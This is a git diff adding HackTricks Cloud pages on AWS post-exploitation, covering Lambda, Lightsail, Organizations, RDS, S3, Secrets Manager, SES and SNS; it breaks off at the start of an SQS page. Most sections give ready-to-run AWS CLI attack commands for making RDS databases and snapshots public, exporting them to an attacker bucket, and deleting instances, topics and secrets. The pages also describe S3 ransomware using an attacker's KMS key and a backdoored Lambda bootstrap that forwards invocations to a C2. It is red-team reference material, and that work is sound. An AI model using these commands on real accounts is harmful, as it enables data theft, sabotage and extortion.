+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md new file mode 100644 index 0000000000..94ea216845 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md @@ -0,0 +1,89 @@ +# AWS - Steal Lambda Requests + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lambda Flow + +

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

+ +1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. +2. The init process listens on port **9001** exposing some interesting endpoints: + * **`/2018-06-01/runtime/invocation/next`** – get the next invocation event + * **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke + * **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error +3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). +4. Finally, **bootstrap.py** sends to init the **response** + +Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. + +## Stealing Lambda Requests + +The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. + +This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: + +* **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. 
+ * A request must be sent to **`/${invoke-id}/response`** + * The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). +* Execute a malicious **`boostrap.py`** which will handle the next invocations + * For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. + * For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. + +### Attack Steps + +1. Find a **RCE** vulnerability. +2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda\_bootstrap\_switcher/main/backdoored\_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) +3. **Execute** the malicious bootstrap. + +You can easily perform these actions running: + +```bash +python3 <[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md new file mode 100644 index 0000000000..db17d6d72f --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md @@ -0,0 +1,56 @@ +# AWS - Lightsail Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lightsail + +For more information, check: + +{% content-ref url="../aws-services/aws-lightsail-enum.md" %} +[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) +{% endcontent-ref %} + +### Restore old DB snapshots + +If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it. + +### Restore Instance Snapshots + +Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\ +Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance. + +### Access Sensitive Information + +Check out the Lightsail privesc options to learn different ways to access potential sensitive information: + +{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} +[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md new file mode 100644 index 0000000000..9bd9c70bb1 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md @@ -0,0 +1,47 @@ +# AWS - Organizations Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Organizations + +For more info about AWS Organizations check: + +{% content-ref url="../aws-services/aws-organizations-enum.md" %} +[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) +{% endcontent-ref %} + +### Leave the Org + +{% code overflow="wrap" %} +```bash +aws organizations deregister-account --account-id --region +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md new file mode 100644 index 0000000000..1e45f292dc --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md @@ -0,0 +1,127 @@ +# AWS - RDS Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## RDS + +For more information check: + +{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} +[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) +{% endcontent-ref %} + +### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance` + +If the attacker has enough permissions, he could make a **DB publicly accessible** by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot. + +```bash +aws rds describe-db-instances # Get DB identifier + +aws rds create-db-snapshot \ + --db-instance-identifier \ + --db-snapshot-identifier cloudgoat + +# Get subnet groups & security groups +aws rds describe-db-subnet-groups +aws ec2 describe-security-groups + +aws rds restore-db-instance-from-db-snapshot \ + --db-instance-identifier "new-db-not-malicious" \ + --db-snapshot-identifier \ + --db-subnet-group-name \ + --publicly-accessible \ + --vpc-security-group-ids + +aws rds modify-db-instance \ + --db-instance-identifier "new-db-not-malicious" \ + --master-user-password 'Llaody2f6.123' \ + --apply-immediately + +# Connect to the new DB after a few mins +``` + +### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot` + +An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot. + +If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**. 
+ +{% code overflow="wrap" %} +```bash +# create snapshot +aws rds create-db-snapshot --db-instance-identifier --db-snapshot-identifier + +# Make it public/share with attackers account +aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all +## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"} +``` +{% endcode %} + +### `rds:DownloadDBLogFilePortion` + +An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions. + +{% code overflow="wrap" %} +```bash +aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text +``` +{% endcode %} + +**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials. + +### `rds:DeleteDBInstance` + +An attacker with these permissions can **DoS existing RDS instances**. + +{% code overflow="wrap" %} +```bash +# Delete +aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot +``` +{% endcode %} + +**Potential impact**: Deletion of existing RDS instances, and potential loss of data. + +### `rds:StartExportTask` + +{% hint style="info" %} +TODO: Test +{% endhint %} + +An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot. 
+ +{% code overflow="wrap" %} +```bash +aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id +``` +{% endcode %} + +**Potential impact**: Access to sensitive data in the exported snapshot. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md new file mode 100644 index 0000000000..ba908badb5 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md @@ -0,0 +1,64 @@ +# AWS - S3 Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## S3 + +For more information check: + +{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %} +[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md) +{% endcontent-ref %} + +### Sensitive Information + +Sometimes you will be able to find sensitive information in readable in the buckets. For example, terraform state secrets. + +### Pivoting + +Different platforms could be using S3 to store sensitive assets.\ +For example, **airflow** could be storing **DAGs** **code** in there, or **web pages** could be directly served from S3. An attacker with write permissions could **modify the code** from the bucket to **pivot** to other platforms, or **takeover accounts** modifying JS files. + +### S3 Ransomware + +In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted. + +The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more. + +To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. 
If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket. + +Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key. + +To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost. + +Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack. + +**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.** + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md new file mode 100644 index 0000000000..cc0591b88b --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md @@ -0,0 +1,76 @@ +# AWS - Secrets Manager Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Secrets Manager + +For more information check: + +{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} +[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) +{% endcontent-ref %} + +### Read Secrets + +The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. + +### DoS Change Secret Value + +Changing the value of the secret you could **DoS all the system that depends on that value.** + +{% hint style="warning" %} +Note that previous values are also stored, so it's easy to just go back to the previous value. +{% endhint %} + +```bash +# Requires permission secretsmanager:PutSecretValue +aws secretsmanager put-secret-value \ + --secret-id MyTestSecret \ + --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" +``` + +### DoS Change KMS key + +```bash +aws secretsmanager update-secret \ + --secret-id MyTestSecret \ + --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE +``` + +### DoS Deleting Secret + +The minimum number of days to delete a secret are 7 + +```bash +aws secretsmanager delete-secret \ + --secret-id MyTestSecret \ + --recovery-window-in-days 7 +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md new file mode 100644 index 0000000000..6e41ef5861 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md @@ -0,0 +1,117 @@ +# AWS - SES Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SES + +For more information check: + +{% content-ref url="../aws-services/aws-ses-enum.md" %} +[aws-ses-enum.md](../aws-services/aws-ses-enum.md) +{% endcontent-ref %} + +### `ses:SendEmail` + +Send an email. + +{% code overflow="wrap" %} +```bash +aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json +aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json +``` +{% endcode %} + +Still to test. + +### `ses:SendRawEmail` + +Send an email. + +```bash +aws ses send-raw-email --raw-message file://message.json +``` + +Still to test. + +### `ses:SendTemplatedEmail` + +Send an email based on a template. + +{% code overflow="wrap" %} +```bash +aws ses send-templated-email --source --destination --template +``` +{% endcode %} + +Still to test. + +### `ses:SendBulkTemplatedEmail` + +Send an email to multiple destinations + +```bash +aws ses send-bulk-templated-email --source --template +``` + +Still to test. + +### `ses:SendBulkEmail` + +Send an email to multiple destinations. + +``` +aws sesv2 send-bulk-email --default-content --bulk-email-entries +``` + +### `ses:SendBounce` + +Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. + +{% code overflow="wrap" %} +```bash +aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list +``` +{% endcode %} + +Still to test. + +### `ses:SendCustomVerificationEmail` + +This will send a customized verification email. You might need permissions also to created the template email. + +{% code overflow="wrap" %} +```bash +aws ses send-custom-verification-email --email-address --template-name +aws sesv2 send-custom-verification-email --email-address --template-name +``` +{% endcode %} + +Still to test. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md new file mode 100644 index 0000000000..7492acfd1e --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md @@ -0,0 +1,112 @@ +# AWS - SNS Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SNS + +For more information: + +{% content-ref url="../aws-services/aws-sns-enum.md" %} +[aws-sns-enum.md](../aws-services/aws-sns-enum.md) +{% endcontent-ref %} + +### Disrupt Messages + +In several cases, SNS topics are used to send messages to platforms that are being monitored (emails, slack messages...). If an attacker prevents sending the messages that alert about it presence in the cloud, he could remain undetected. + +### `sns:DeleteTopic` + +An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic. + +```bash +aws sns delete-topic --topic-arn +``` + +**Potential Impact**: Message loss and service disruption for applications using the deleted topic. + +### `sns:Publish` + +An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. + +```bash +aws sns publish --topic-arn --message +``` + +**Potential Impact**: Data corruption, unintended actions, or resource exhaustion. + +### `sns:SetTopicAttributes` + +An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability. + +{% code overflow="wrap" %} +```bash +aws sns set-topic-attributes --topic-arn --attribute-name --attribute-value +``` +{% endcode %} + +**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. + +### `sns:Subscribe` , `sns:Unsubscribe` + +An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. + +{% code overflow="wrap" %} +```bash +aws sns subscribe --topic-arn --protocol --endpoint +aws sns unsubscribe --subscription-arn +``` +{% endcode %} + +**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic. 
+ +### `sns:AddPermission` , `sns:RemovePermission` + +An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic. + +```css +aws sns add-permission --topic-arn --label --aws-account-id --action-name +aws sns remove-permission --topic-arn --label +``` + +**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. + +### `sns:TagResource` , `sns:UntagResource` + +An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. + +{% code overflow="wrap" %} +```bash +aws sns tag-resource --resource-arn --tags Key=,Value= +aws sns untag-resource --resource-arn --tag-keys +``` +{% endcode %} + +**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md new file mode 100644 index 0000000000..09584ee404 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md @@ -0,0 +1,113 @@ +# AWS - SQS Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
